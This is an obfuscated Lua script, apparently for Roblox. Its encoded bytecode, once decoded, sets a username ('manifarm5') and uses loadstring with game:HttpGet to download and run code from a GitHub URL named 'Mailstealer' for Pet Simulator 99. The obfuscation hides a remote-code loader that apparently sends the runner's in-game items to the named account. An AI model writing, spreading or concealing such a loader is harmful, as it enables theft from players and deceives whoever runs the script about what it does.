--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0 -0 ;local v32;while true do if (v31==((621 -(555 + 64)) -1)) then return v32;end if (v31==(0 -(931 -(857 + 74)))) then v32=v1(v16,v19,v19);v19=v19 + 1 ;v31=2 -1 ;end end end v23=nil;function v23()local v33,v34=v1(v16,v19,v19 + 2 );v19=v19 + (570 -(367 + 201)) ;return (v34 * (1183 -(214 + 713))) + v33 ;end v18=3;end if (v18==4) then function v25()local v35=v24();local v36=v24();local v37=1 + 0 ;local v38=(v21(v36,1,4 + 16 ) * ((879 -(282 + 595))^(1669 -(1523 + 114)))) + v35 ;local v39=v21(v36,19 + 2 ,43 -12 );local v40=((v21(v36,1097 -(68 + 997) )==((5051 -3780) -(226 + 1044))) and  -(4 -3)) or (118 -(32 + 62 + 23)) ;if (v39==(0 + 0)) then if (v38==(0 + 0)) then return v40 * (957 -((1889 -(915 + 82)) + 65)) ;else local v77=(952 -(802 + 150)) -0 ;while true do if (v77==(0 -(0 -0))) then v39=1 -0 ;v37=350 -(87 + 263) ;break;end end end elseif (v39==(2227 -(67 + 113))) then return ((v38==(0 + 0)) and (v40 * (1/0))) or (v40 * NaN) ;end return v8(v40,v39-(2511 -1488) ) * (v37 + (v38/((2 + (0 -0))^52))) ;end v26=nil;function v26(v41)local v42=0 -0 ;local v43;local v44;while true do if (v42==(1 + 0)) then v43=v3(v16,v19,(v19 + v41) -(1 -0) );v19=v19 + v41 ;v42=1189 -((3359 -2290) + 118) ;end if ((0 -0)==v42) then v43=nil;if  not v41 then local v94=0 -0 ;while true do if (v94==(0 + (18 -(10 + 8)))) then v41=v24();if (v41==0) then return "";end break;end end end v42=1 -0 ;end if (v42==2) then v44={};for v78=1, #v43 do v44[v78]=v2(v1(v3(v43,v78,v78)));end v42=3 + 0 ;end if (v42==(794 -((1415 -1047) + (865 -(416 + 26))))) then return v6(v44);end end end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0 -0 ;local v46;local v47;local v48;local v49;local v50;local v51;while true do local v67=438 -(262 + 176) ;while true do if (v67==(1024 -(706 + 318))) then if (v45==(1254 -(721 + 530))) then local v97=1721 -(345 + 1376) ;while true do if (v97==(688 -(198 + 490))) then for v107=2 -1 ,v24() do v47[v107-(1 + 0) ]=v29();end return v49;end end end if (v45==2) then local v98=0 -0 ;while true do if (v98==(2 -1)) then for v109=1,v24() do local v110=1206 -(696 + 510) ;local v111;local v112;while true do if ((0 -0)~=v110) then else local v120=0;while true do if (v120~=(1263 -(1091 + 171))) then else v110=1 + 0 ;break;end if (v120==(0 -0)) then v111=0;v112=nil;v120=3 -2 ;end end end if (v110==(375 -(123 + 251))) then while true do if (v111==(0 -0)) then v112=v22();if (v21(v112,699 -(208 + 490) ,1)~=(0 + 0)) then else local v140=0 + 0 ;local v141;local v142;local v143;while true do if (v140==(836 -(660 + 176))) then v141=v21(v112,1 + 1 ,3);v142=v21(v112,533 -(406 + 123) ,6);v140=1770 -(1749 + 20) ;end if (v140~=(204 -(14 + 188))) then else local v178=0;while true do if (v178~=(676 -(534 + 141))) then else v140=3;break;end if (v178==(0 + 0)) then local v186=0 + 0 ;while true do if (v186==(0 + 0)) then if (v21(v142,1,1 -0 )~=1) then else v143[2 -0 ]=v51[v143[2]];end if (v21(v142,4 -2 ,2)~=(2 -1)) then else v143[1903 -(106 + 1794) ]=v51[v143[1 + 2 ]];end v186=1 + 0 ;end if (v186==1) then v178=1;break;end end end end end if ((8 -5)==v140) then if (v21(v142,3,2 + 1 )==(1 + 0)) then v143[118 -(4 + 110) ]=v51[v143[4]];end v46[v109]=v143;break;end if (1==v140) then local v180=396 -(115 + 281) ;while true do if (v180==(0 -0)) then local v187=584 -(57 + 527) ;while true do if ((1 + 0)==v187) then v180=1;break;end if (v187==(0 -0)) then v143={v23(),v23(),nil,nil};if (v141==0) then local v192=0 -0 ;local v193;local v194;local v195;while true do if (v192==(1 -0)) then v195=nil;while true do if (0~=v193) then else local v198=0 -0 ;while true do if (v198~=(0 -0)) then else v194=0 -0 ;v195=nil;v198=286 -(134 + 151) ;end if (v198~=(1666 -(970 + 695))) then else v193=1;break;end end end if (v193~=(1 -0)) then else while true do if (v194==0) then v195=0;while true do if (0~=v195) then else v143[3 + 0 ]=v23();v143[1994 -(582 + 1408) ]=v23();break;end end break;end end break;end end break;end if (v192==0) then v193=0 -0 ;v194=nil;v192=1;end end elseif (v141==(1 -0)) then v143[3]=v24();elseif (v141==(7 -5)) then v143[68 -(30 + 35) ]=v24() -((1826 -(1195 + 629))^(11 + 5)) ;elseif (v141==(3 -0)) then local v199=0;while true do if (v199~=(1257 -(1043 + 214))) then else v143[11 -8 ]=v24() -((1214 -(323 + 889))^(42 -26)) ;v143[4]=v23();break;end end end v187=242 -(187 + 54) ;end end end if (v180~=1) then else v140=2;break;end end end end end break;end end break;end end end v45=3;break;end if (v98~=0) then else for v113=781 -(162 + 618) ,v50 do local v114=580 -(361 + 219) ;local v115;local v116;local v117;local v118;local v119;while true do if ((0 + 0)~=v114) then else v115=0;v116=nil;v114=1 + 0 ;end if (v114==(415 -(15 + 398))) then v119=nil;while true do if (v115==1) then local v121=982 -(18 + 964) ;while true do if (v121==0) then v118=nil;v119=nil;v121=3 -2 ;end if (v121==(1 + 0)) then v115=3 -1 ;break;end end end if (v115==(0 -0)) then local v122=0 + 0 ;while true do if (v122==(127 -(116 + 10))) then v115=1 + 0 ;break;end if (v122~=0) then else v116=1636 -(1373 + 263) ;v117=nil;v122=1001 -(451 + 549) ;end end end if (v115==2) then while true do if (v116~=(0 + 0)) then else local v164=0 + 0 ;while true do if (v164==0) then local v181=0 -0 ;while true do if (0~=v181) then else v117=0 -0 ;v118=nil;v181=1385 -(746 + 638) ;end if (v181==(1 + 0)) then v164=1;break;end end end if (v164==(1 -0)) then v116=342 -(218 + 123) ;break;end end end if (v116==(1552 -(1126 + 425))) then v119=nil;while true do if (v117~=(405 -(118 + 287))) then else local v182=1581 -(1535 + 46) ;while true do if (v182==(0 + 0)) then v118=v22();v119=nil;v182=1122 -(118 + 1003) ;end if (v182~=1) then else v117=1 + 0 ;break;end end end if (v117==(561 -(306 + 254))) then if (v118==(1 + 0)) then v119=v22()~=(0 -0) ;elseif (v118==2) then v119=v25();elseif (v118~=(13 -10)) then else v119=v26();end v51[v113]=v119;break;end end break;end end break;end end break;end if ((1468 -(899 + 568))==v114) then v117=nil;v118=nil;v114=2 + 0 ;end end end v49[3]=v22();v98=2 -1 ;end end end v67=604 -(268 + 335) ;end if (v67==(1 + 0)) then if (v45==(290 -(60 + 230))) then v46={};v47={};v48={};v45=573 -(426 + 146) ;end if (v45==1) then v49={v46,v47,nil,v48};v50=v24();v51={};v45=813 -(569 + 242) ;end break;end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v52)if (v1(v52,2)==79) then local v68=0;while true do if (v68==0) then v20=v0(v3(v52,1,1));return "";end end else local v69=0;local v70;while true do if (v69==0) then v70=v2(v0(v52,16));if v20 then local v99=v5(v70,v20);v20=nil;return v99;else return v70;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v53,v54,v55,v56=v1(v16,v19,v19 + (6 -3) );v19=v19 + (11 -7) ;return (v56 * 16777216) + (v55 * (146737 -81201)) + (v54 * (75 + 181)) + v53 ;end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=0;local v61;local v62;local v63;while true do if (v60==0) then v61=v57[1];v62=v57[2];v60=1;end if (v60==1) then v63=v57[3];return function(...)local v80=v61;local v81=v62;local v82=v63;local v83=v28;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v95=0,v88 do if (v95>=v82) then v86[v95-v82 ]=v87[v95 + 1 ];else v90[v95]=v87[v95 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do local v96=0;while true do if (v96==1) then if (v93<=9) then if (v93<=4) then if (v93<=1) then if (v93==0) then do return;end elseif ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v59;else v90[v92[2]]=v59[v92[3]];end elseif (v93<=2) then do return;end elseif (v93==3) then local v147=v92[2];v90[v147]=v90[v147](v13(v90,v147 + 1 ,v85));else v90[v92[2]]=v92[3];end elseif (v93<=6) then if (v93>5) then v90[v92[2]]();else v90[v92[2]]();end elseif (v93<=7) then v90[v92[2]]=v92[3];elseif (v93>8) then if ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v59;else v90[v92[2]]=v59[v92[3]];end else v59[v92[3]]=v90[v92[2]];end elseif (v93<=14) then if (v93<=11) then if (v93>10) then local v125=0;local v126;while true do if (0==v125) then v126=v92[2];v90[v126]=v90[v126](v13(v90,v126 + 1 ,v85));break;end end elseif (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93<=12) then local v127=v92[2];local v128=v90[v92[3]];v90[v127 + 1 ]=v128;v90[v127]=v128[v92[4]];elseif (v93>13) then v84=v92[3];else local v155=v92[2];local v156=v90[v92[3]];v90[v155 + 1 ]=v156;v90[v155]=v156[v92[4]];end elseif (v93<=16) then if (v93==15) then v59[v92[3]]=v90[v92[2]];else v84=v92[3];end elseif (v93<=17) then local v135=0;local v136;local v137;local v138;local v139;while true do if (v135==0) then v136=v92[2];v137,v138=v83(v90[v136](v13(v90,v136 + 1 ,v92[3])));v135=1;end if (v135==1) then v85=(v138 + v136) -1 ;v139=0;v135=2;end if (v135==2) then for v174=v136,v85 do v139=v139 + 1 ;v90[v174]=v137[v139];end break;end end elseif (v93==18) then if (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end else local v160=v92[2];local v161,v162=v83(v90[v160](v13(v90,v160 + 1 ,v92[3])));v85=(v162 + v160) -1 ;local v163=0;for v168=v160,v85 do v163=v163 + 1 ;v90[v168]=v161[v163];end end v84=v84 + 1 ;break;end if (v96==0) then v92=v80[v84];v93=v92[1];v96=1;end end end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66)if v66 then local v71=(v64/((9 -(5 + 2))^(v65-(754 -(239 + 514)))))%((1 + 1)^(((v66-(1330 -(797 + 532))) -(v65-1)) + 1 + 0)) ;return v71-(v71%((1 -0) + 0)) ;else local v72=0;local v73;while true do if (v72==(0 -0)) then v73=((2281 -1077) -(373 + 829))^(v65-(732 -(476 + 255))) ;return (((v64%(v73 + v73))>=v73) and (1131 -(369 + 761))) or 0 ;end end end end v22=nil;v18=2;end end end v15("LOL!073O00028O0003083O00557365726E616D6503093O006D616E696661726D35030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F50657453696D756C61746F722O392F6D61696E2F4D61696C737465616C6572000F3O0012073O00013O00260A3O0001000100010004103O00010001001207000100033O001208000100023O001201000100043O001201000200053O00200C000200020006001207000400074O0013000200044O000B00013O00022O00050001000100010004103O000E00010004103O000100016O00017O00",v9(),...);
